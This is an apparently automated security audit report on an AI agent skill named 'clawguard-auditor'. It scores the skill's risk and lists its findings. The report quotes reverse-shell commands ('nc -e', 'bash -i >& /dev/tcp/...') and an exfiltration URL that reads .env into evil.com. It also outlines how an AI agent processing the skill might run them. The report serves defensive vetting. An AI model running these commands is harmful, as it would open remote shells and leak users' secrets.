Skill Trust Decision

clawguard-auditor

Security auditor skill contains embedded reverse shell patterns (nc -e, bash -i >& /dev/tcp) and data exfiltration examples (evil.com/?data=$(cat .env)) within documentation. No executable code files present, but the skill specification describes extensive capabilities (filesystem:WRITE, network:READ, shell:ADMIN) without implementation.

Install decision first
Source: Manual upload · Scanned: Apr 3, 2026
Files 3
Artifacts 3
Violations 0
Findings 4

Most direct threat evidence

01
Skill masquerades as legitimate security auditor
Entry · SKILL.md

02
Documentation embeds reverse shell patterns as 'detection examples'
weaponization · SKILL.md

03
AI agent extracts and interprets embedded patterns during skill processing
exploitation · SKILL.md

Why this conclusion was reached

2/4 dimensions flagged
Pass
Declared vs actual capability

Declared resources and inferred behavior are broadly aligned.

Block
Hidden execution and egress

2 high-risk artifacts or egress signals were extracted.

Block
Attack chain and severe findings

The report includes 4 attack-chain steps and 1 severe finding.

Review
Dependencies and supply chain hygiene

Dependency information is incomplete, so supply-chain confidence stays limited.

Attack Chain

01
Skill masquerades as legitimate security auditor

Entry · SKILL.md:1

02
Documentation embeds reverse shell patterns as 'detection examples'

weaponization · SKILL.md:55

03
AI agent extracts and interprets embedded patterns during skill processing

exploitation · SKILL.md:55

04
Potential execution of nc -e /dev/tcp or bash reverse shell commands

Impact · SKILL.md:55

What drove the risk score up

Embedded reverse shell patterns +20

SKILL.md:55 contains 'nc -e' and 'bash -i >& /dev/tcp' strings embedded in documentation

Data exfiltration example URL +10

SKILL.md:99 contains 'http://evil.com/?data=$(cat .env)' as detection example

Capabilities mismatch +8

Skill describes extensive capabilities (WRITE, ADMIN, NET_EGRESS) for documentation-only implementation

No executable files -5

Absence of scripts/ directory, requirements.txt, or any code files reduces practical risk

Benign context -3

Patterns appear in 'SAST Red Flag Hunt' section as detection examples

Documentation artifacts -8

All files are Markdown/JSON with no executable code present

Most important evidence

High

Embedded reverse shell command patterns

SKILL.md contains literal strings 'nc -e' and 'bash -i >& /dev/tcp/10.0.0.1/8080 0>&1' at line 55 within a list of 'red flags to detect'. While in context these are examples, they represent dangerous patterns that could be extracted by prompt injection or interpreted by a compromised AI agent.

SKILL.md:55
Remove or escape dangerous patterns in documentation. Use generic descriptions like 'network connection backdoors' instead of literal command syntax.

Medium

Data exfiltration pattern example

SKILL.md contains 'http://evil.com/?data=$(cat .env)' as an example of what the DLP engine should block. This embeds a real exfiltration technique as instructional content.

SKILL.md:99
Replace with generic description: 'URL parameter data exfiltration attempts'.

Medium

Capabilities exceed implementation

The skill describes requiring CAP_FS_WRITE, CAP_NET_EGRESS, CAP_SYS_EXEC, and CAP_FS_READ_SENSITIVE capabilities, but no executable code files exist. This creates a mismatch between declared purpose and actual functionality.

SKILL.md:25
If this is documentation-only, declare NONE for all resource levels.

Low

Documentation-only implementation

All files are Markdown or JSON with no scripts/, requirements.txt, package.json, or any executable code. The skill is a specification without implementation.

SKILL.md:1
Verify if actual implementation files exist or are expected.

Declared capability vs actual capability

Filesystem · Pass · Declared WRITE · Inferred NONE
SKILL.md describes CAP_FS_WRITE capability but no code exists to exercise it

Network · Pass · Declared READ · Inferred NONE
SKILL.md describes NET_EGRESS token but no network code present

Shell · Pass · Declared ADMIN · Inferred NONE
No shell scripts or subprocess calls in any file

Environment · Pass · Declared READ · Inferred NONE
Mentions credential access but no code implements it

Suspicious artifacts and egress

Critical Dangerous Command
nc -e

SKILL.md:55

Critical Dangerous Command
bash -i >&

SKILL.md:55

Medium External URL
http://evil.com/?data=$(cat

SKILL.md:99

Dependencies and supply chain

There are no structured dependency warnings.

File composition

3 files · 271 lines
Markdown 2 files · 263 lines
JSON 1 file · 8 lines
Files of concern · 1
SKILL.md Markdown · 149 lines
Embedded reverse shell command patterns · Data exfiltration pattern example · Capabilities exceed implementation · Documentation-only implementation · nc -e · bash -i >& · http://evil.com/?data=$(cat
Other files · README.md · _meta.json

Security positives

No executable scripts or binary files present
No actual network connections or data exfiltration attempted
No credential harvesting code implemented
No base64-encoded payloads or obfuscated code
Patterns appear in documented 'detection examples' context rather than as instructions